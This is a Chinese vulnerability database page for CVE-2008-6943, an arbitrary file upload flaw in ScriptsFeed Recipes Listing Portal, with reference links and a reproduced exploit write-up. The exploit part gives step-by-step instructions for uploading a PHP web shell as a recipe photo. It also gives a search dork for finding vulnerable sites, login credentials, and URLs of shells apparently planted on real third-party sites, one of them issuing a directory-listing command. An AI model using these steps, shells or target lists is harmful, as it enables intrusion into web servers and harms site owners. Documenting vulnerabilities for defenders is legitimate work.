ScriptsFeed Recipes Listing Portal 任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1182065 漏洞类型 输入验证
发布时间 2009-08-12 更新时间 2009-08-12
CVE编号 CVE-2008-6943 CNNVD-ID CNNVD-200908-109
漏洞平台 N/A CVSS评分 6.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2009080108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-109
|漏洞详情
ScriptsFeedRecipesListingPortal的任意文件上传漏洞。远程认证用户通过上传一个具有例如recipephoto那样的可执行扩展名的一个文件并向pictures/的文件提交一个直接请求来访问该文件,以执行任意代码。
|漏洞EXP
[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( Ãok site var sömürün : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

you register to site 

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you click to "Add a Recipe" and add recipe

and after click to "View your Recipes" click to you recipe open new page 

right click to your photo. select properties copy photo lick

and paste your explorer go your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )

misal:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

|参考资料

来源:XF
名称:recipeslistingportal-image-file-upload(46607)
链接:http://xforce.iss.net/xforce/xfdb/46607
来源:BID
名称:32293
链接:http://www.securityfocus.com/bid/32293
来源:MILW0RM
名称:7112
链接:http://www.milw0rm.com/exploits/7112
来源:SECUNIA
名称:32690
链接:http://secunia.com/advisories/32690
来源:OSVDB
名称:49960
链接:http://osvdb.org/49960